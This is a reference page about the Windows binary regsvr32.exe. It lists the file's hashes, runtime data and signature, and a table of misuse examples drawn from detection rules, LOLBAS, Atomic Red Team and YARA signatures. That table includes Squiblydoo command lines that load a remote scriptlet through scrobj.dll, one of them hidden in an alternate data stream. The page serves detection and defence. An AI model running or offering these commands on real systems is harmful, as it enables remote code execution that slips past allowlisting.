regsvr32.exe
- File Path:
C:\Windows\system32\regsvr32.exe - Description: Microsoft(C) Register Server
Screenshot
Hashes
| Type | Hash |
|---|---|
| MD5 | DA0E9A7777D16AE18BD9C642A9F42223 |
| SHA1 | FC99212A5F929D707AF49E8151CAB1E30FF658EB |
| SHA256 | F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67 |
| SHA384 | 6C3A7F8CA950E09AD85D774B4DB80781E9715A2A7011D784CFB86AC28A63A75AE8EE49F7BB12574412439FC0F94AD960 |
| SHA512 | 1ED60C4D41EAE79A85F975891A018951503A53F083D2140B1F537A88AB5976D1DA239C8ACE57173B8CE3BA8CBD3DE07D5AEA5FA1B7C271E5F7B4444594D04D7D |
| SSDEEP | 384:JPDotrdGJJHqNFYJypeqMKMPlhd5QkSg4rT9m/iGcQlUHB2rAOWrnLHWB:lDotrdGCNFR4XP9+khi9m/iGc4Uh2cL |
| IMP | 0235FF9A007804882636BCCCFB4D1A2F |
| PESHA1 | 3F560BAEF52531C6A0A2935525802A9B82066D76 |
| PE256 | FA2F47546E63D978C53CB703509435FCBE34CD8560B35D9C17AA2FA13E1CADCA |
Runtime Data
Window Title:
RegSvr32
Open Handles:
| Path | Type |
|---|---|
| (R-D) C:\Windows\Fonts\StaticCache.dat | File |
| (R-D) C:\Windows\System32\en-US\imageres.dll.mui | File |
| (R-D) C:\Windows\System32\en-US\regsvr32.exe.mui | File |
| (RW-) C:\Users\user | File |
| (RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1518_none_de6e2bd0534e2567 | File |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000004.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000004.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro | Section |
| \BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 | Section |
| \BaseNamedObjects\NLS_CodePage_437_3_2_0_0 | Section |
| \Sessions\2\Windows\Theme2131664586 | Section |
| \Windows\Theme966197582 | Section |
Loaded Modules:
| Path |
|---|
| C:\Windows\SYSTEM32\AcLayers.dll |
| C:\Windows\System32\ADVAPI32.dll |
| C:\Windows\SYSTEM32\apphelp.dll |
| C:\Windows\System32\bcrypt.dll |
| C:\Windows\System32\bcryptPrimitives.dll |
| C:\Windows\System32\combase.dll |
| C:\Windows\System32\GDI32.dll |
| C:\Windows\System32\gdi32full.dll |
| C:\Windows\SYSTEM32\IPHLPAPI.DLL |
| C:\Windows\System32\kernel.appcore.dll |
| C:\Windows\System32\KERNEL32.DLL |
| C:\Windows\System32\KERNELBASE.dll |
| C:\Windows\System32\msvcp_win.dll |
| C:\Windows\System32\msvcrt.dll |
| C:\Windows\SYSTEM32\ntdll.dll |
| C:\Windows\System32\OLEAUT32.dll |
| C:\Windows\SYSTEM32\PROPSYS.dll |
| C:\Windows\system32\regsvr32.exe |
| C:\Windows\System32\RPCRT4.dll |
| C:\Windows\System32\sechost.dll |
| C:\Windows\SYSTEM32\sfc.dll |
| C:\Windows\SYSTEM32\sfc_os.DLL |
| C:\Windows\System32\shcore.dll |
| C:\Windows\System32\SHLWAPI.dll |
| C:\Windows\System32\ucrtbase.dll |
| C:\Windows\System32\USER32.dll |
| C:\Windows\System32\win32u.dll |
| C:\Windows\SYSTEM32\WINSPOOL.DRV |
Signature
- Status: Signature verified.
- Serial:
33000001C422B2F79B793DACB20000000001C4 - Thumbprint:
AE9C1AE54763822EEC42474983D8B635116C8452 - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: REGSVR32.EXE.MUI
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.17763.1 (WinBuild.160101.0800)
- Product Version: 10.0.17763.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 64-bit
File Scan
- VirusTotal Detections: 0/69
- VirusTotal Link: https://www.virustotal.com/gui/file/f098fa150d9199732b4ec2e81528a951503a30f75afebf7e7a48360301758c67/detection/
File Similarity (ssdeep match)
| File | Score |
|---|---|
| C:\Windows\SysWOW64\regsvr32.exe | 33 |
Possible Misuse
The following table contains possible examples of regsvr32.exe being misused. While regsvr32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | godmode_sigma_rule.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | edr_command_execution_by_office_applications.yml | description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 |
DRL 1.0 |
| sigma | sysmon_suspicious_remote_thread.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | dns_query_win_regsvr32_network_activity.yml | title: Regsvr32 Network Activity |
DRL 1.0 |
| sigma | dns_query_win_regsvr32_network_activity.yml | description: Detects network connections and DNS queries initiated by Regsvr32.exe |
DRL 1.0 |
| sigma | dns_query_win_regsvr32_network_activity.yml | - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ |
DRL 1.0 |
| sigma | dns_query_win_regsvr32_network_activity.yml | Image\|endswith: '\regsvr32.exe' |
DRL 1.0 |
| sigma | file_event_win_creation_system_file.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | file_event_win_susp_clr_logs.yml | - 'regsvr32' |
DRL 1.0 |
| sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | # - '\regsvr32.exe' triggered by installing common software |
DRL 1.0 |
| sigma | net_connection_win_regsvr32_network_activity.yml | title: Regsvr32 Network Activity |
DRL 1.0 |
| sigma | net_connection_win_regsvr32_network_activity.yml | description: Detects network connections and DNS queries initiated by Regsvr32.exe |
DRL 1.0 |
| sigma | net_connection_win_regsvr32_network_activity.yml | - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ |
DRL 1.0 |
| sigma | net_connection_win_regsvr32_network_activity.yml | Image\|endswith: '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_bluemashroom.yml | - '\regsvr32' |
DRL 1.0 |
| sigma | proc_creation_win_apt_evilnum_jul20.yml | - 'regsvr32' |
DRL 1.0 |
| sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32 |
DRL 1.0 |
| sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | Image\|endswith: '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | CommandLine\|endswith: '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_html_help_spawn.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_lolbins_by_office_applications.yml | - 'regsvr32' |
DRL 1.0 |
| sigma | proc_creation_win_lolbins_with_wmiprvse_parent_process.yml | - 'regsvr32' |
DRL 1.0 |
| sigma | proc_creation_win_malware_qbot.yml | - 'regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_mmc_spawn_shell.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_monitoring_for_persistence_via_bits.yml | CommandLine\|re: '(?i).*bitsadmin.*\/SetNotifyCmdLine.*(%COMSPEC%\|cmd.exe\|regsvr32.exe).*' |
DRL 1.0 |
| sigma | proc_creation_win_mshta_spawn_shell.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_applications_spawning_wmi_commandline.yml | description: Initial execution of malicious document calls wmic to execute the file with regsvr32 |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | title: Excel Proxy Executing Regsvr32 With Payload |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - 'regsvr32' |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | title: Excel Proxy Executing Regsvr32 With Payload |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | - '*regsvr32*' |
DRL 1.0 |
| sigma | proc_creation_win_office_shell.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_office_spawning_wmi_commandline.yml | description: Initial execution of malicious document calls wmic to execute the file with regsvr32 |
DRL 1.0 |
| sigma | proc_creation_win_outlook_shell.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_possible_applocker_bypass.yml | # - '\regsvr32.exe' # too many FPs, very noisy |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - 'regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - 'regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_script_event_consumer_spawn.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_powershell_parent_process.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_anomalies.yml | title: Regsvr32 Anomaly |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_anomalies.yml | description: Detects various anomalies in relation to regsvr32.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_anomalies.yml | Image\|endswith: '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_anomalies.yml | ParentImage\|endswith: '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_anomalies.yml | CommandLine\|contains: '..\..\..\Windows\System32\regsvr32.exe ' |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_flags_anomaly.yml | title: Regsvr32 Flags Anomaly |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_flags_anomaly.yml | description: Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_flags_anomaly.yml | Image\|endswith: '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_http_pattern.yml | title: Suspicious Regsvr32 HTTP IP Pattern |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_http_pattern.yml | description: Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_image.yml | title: Suspicious Regsvr32 Execution With Image Extension |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_image.yml | description: utilizes REGSVR32.exe to execute this DLL masquerading as a Image file |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_image.yml | Image\|endswith: '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_no_dll.yml | title: Regsvr32 Command Line Without DLL |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_no_dll.yml | Image\|endswith: '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_servu_process_pattern.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_system_exe_anomaly.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_task_folder_evasion.yml | description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr |
DRL 1.0 |
| sigma | proc_creation_win_vmtoolsd_susp_child_process.yml | - '\regsvr32.exe' |
DRL 1.0 |
| sigma | registry_event_asep_reg_keys_modification_currentversion.yml | Image: 'C:\Windows\system32\regsvr32.exe' |
DRL 1.0 |
| sigma | registry_event_office_vsto_persistence.yml | - '\regsvr32.exe' # e.g. default Evernote installation |
DRL 1.0 |
| LOLBAS | Cmd.yml | - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat |
|
| LOLBAS | Regsvr32.yml | Name: Regsvr32.exe |
|
| LOLBAS | Regsvr32.yml | - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll |
|
| LOLBAS | Regsvr32.yml | - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll |
|
| LOLBAS | Regsvr32.yml | - Path: C:\Windows\System32\regsvr32.exe |
|
| LOLBAS | Regsvr32.yml | - Path: C:\Windows\SysWOW64\regsvr32.exe |
|
| LOLBAS | Regsvr32.yml | - IOC: regsvr32.exe retrieving files from Internet |
|
| LOLBAS | Regsvr32.yml | - IOC: regsvr32.exe executing scriptlet (sct) files |
|
| LOLBAS | Regsvr32.yml | - IOC: DotNet CLR libraries loaded into regsvr32.exe |
|
| LOLBAS | Regsvr32.yml | - IOC: DotNet CLR Usage Log - regsvr32.exe.log |
|
| LOLBAS | Regsvr32.yml | - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ |
|
| malware-ioc | nukesped_lazarus | .REGSVR32.EXE``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc | nukesped_lazarus | .REGSVR32.exe``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "value": "Regsvr32 - T1117", |
© ESET 2014-2018 |
| malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "tag_name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Regsvr32 - T1117\"", |
© ESET 2014-2018 |
| malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "description": "Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)\n\nAdversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.\n\nRegsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)\n\nDetection: Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)\n\nPlatforms: Windows\n\nData Sources: Loaded DLLs, Process monitoring, Process command-line parameters, Windows Registry\n\nDefense Bypassed: Process whitelisting, Anti-virus\n\nPermissions Required: User, Administrator\n\nRemote Support: No\n\nContributors: Casey Smith", |
© ESET 2014-2018 |
| malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Regsvr32 - T1117\"", |
© ESET 2014-2018 |
| malware-ioc | oceanlotus | \|T1117\|Regsvr32 |
© ESET 2014-2018 |
| atomic-red-team | problem_report.md | e.g. Run regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll |
MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - T1218.010 Regsvr32 | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #1: Regsvr32 local COM scriptlet execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #3: Regsvr32 local DLL execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #4: Regsvr32 Registering Non DLL [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - T1218.010 Regsvr32 | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: Regsvr32 local COM scriptlet execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #3: Regsvr32 local DLL execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #4: Regsvr32 Registering Non DLL [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | | | | | | Regsvr32 | | | | | | | | | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | | | | | | Regsvr32 | | | | | | | | | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.003.md | Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.008.md | Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | # T1218.010 - Regsvr32 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | <blockquote>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a “Squiblydoo” attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)</blockquote> | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | - Atomic Test #1 - Regsvr32 local COM scriptlet execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | - Atomic Test #2 - Regsvr32 remote COM scriptlet execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | - Atomic Test #3 - Regsvr32 local DLL execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | - Atomic Test #4 - Regsvr32 Registering Non DLL | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | - Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | ## Atomic Test #1 - Regsvr32 local COM scriptlet execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | | filename | Name of the local file, include path. | Path | PathToAtomicsFolder\T1218.010\src\RegSvr32.sct| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | | regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | | regsvr32name | Default name of Regsvr32.exe | String | regsvr32.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | ##### Description: Regsvr32.sct must exist on disk at specified location (#{filename}) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | Invoke-WebRequest “https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct” -OutFile “#{filename}” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | ## Atomic Test #2 - Regsvr32 remote COM scriptlet execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | | url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | ## Atomic Test #3 - Regsvr32 local DLL execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | IF “%PROCESSOR_ARCHITECTURE%”==”AMD64” (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}#{regsvr32name} /s #{dll_name} ) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | ## Atomic Test #4 - Regsvr32 Registering Non DLL | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | ## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.010.md | | regsvr32path | Default location of Regsvr32.exe | String | C:\Windows\system32| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1220.md | Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its Regsvr32/ “Squiblydoo” counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.006.md | regsvr32 /S “C:\Program Files\Oracle\VirtualBox\VboxC.dll” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.006.md | regsvr32 /u /S “C:\Program Files\Oracle\VirtualBox\VboxC.dll” | MIT License. © 2018 Red Canary |
| signature-base | apt_apt30_backspace.yar | $s0 = “regsvr32 /s "%ProgramFiles%\Norton360\Engine\5.1.0.29\ashelper.dll"” fullword | CC BY-NC 4.0 |
| signature-base | apt_codoso.yar | $s1 = “regsvr32.exe /s "%s"” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_leviathan.yar | $x2 = “regsvr32 /s "%s" DR CIM” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_ta17_318A.yar | $s1 = “REGSVR32.EXE.MUI” fullword wide | CC BY-NC 4.0 |
| signature-base | crime_cobaltgang.yar | $x2 = “WriteLine(" (new ActiveXObject(‘WScript.Shell’)).Run(‘regsvr32 /s” ascii | CC BY-NC 4.0 |
| signature-base | crime_cobaltgang.yar | $x4 = “sh.Run(‘regsvr32 /s /u /i:” ascii | CC BY-NC 4.0 |
| signature-base | crime_cobaltgang.yar | $x5 = “.Get(‘Win32_ScheduledJob’).Create(‘regsvr32 /s /u /i:” ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_hacktool_scripts.yar | $s0 = “regsvr32.exe /u C:\windows\system32\PacketX.dll” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_hacktool_scripts.yar | $s1 = “regsvr32.exe C:\windows\system32\PacketX.dll” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_mal_scripts.yar | $x2 = “.Run(‘regsvr32 /s /u /i:” ascii | CC BY-NC 4.0 |
| signature-base | gen_mal_scripts.yar | $x3 = “new ActiveXObject(‘WScript.Shell’)).Run(‘regsvr32 /s” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_recon_indicators.yar | $s11 = “regsvr32 /s /u “ ascii | CC BY-NC 4.0 |
| signature-base | gen_url_persitence.yar | $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s1 = “exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, “ ascii | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s3 = “oShell.Run "c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False” fullword ascii | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s4 = “EchoB("regsvr32.exe exitcode = " & exitcode)” fullword ascii | CC BY-NC 4.0 |
| signature-base | yara_mixed_ext_vars.yar | Identifier: regsvr32 issue | CC BY-NC 4.0 |
| signature-base | yara_mixed_ext_vars.yar | description = “Detects a scriptlet file in the temporary Internet files (see regsvr32 AppLocker bypass)” | CC BY-NC 4.0 |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
regsvr32
Registers .dll files as command components in the registry.
Syntax
regsvr32 [/u] [/s] [/n] [/i[:cmdline]] <Dllname>
Parameters
| Parameter | Description |
|---|---|
| /u | Unregisters server. |
| /s | Prevents displaying messages. |
| /n | Prevents calling DllRegisterServer. This parameter requires you to also use the /i parameter. |
/i:<cmdline> |
Passes an optional command-line string (cmdline) to DllInstall. If you use this parameter with the /u parameter, it calls DllUninstall. |
<Dllname> |
The name of the .dll file that will be registered. |
| /? | Displays help at the command prompt. |
Examples
To register the .dll for the Active Directory Schema, type:
regsvr32 schmmgmt.dll
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.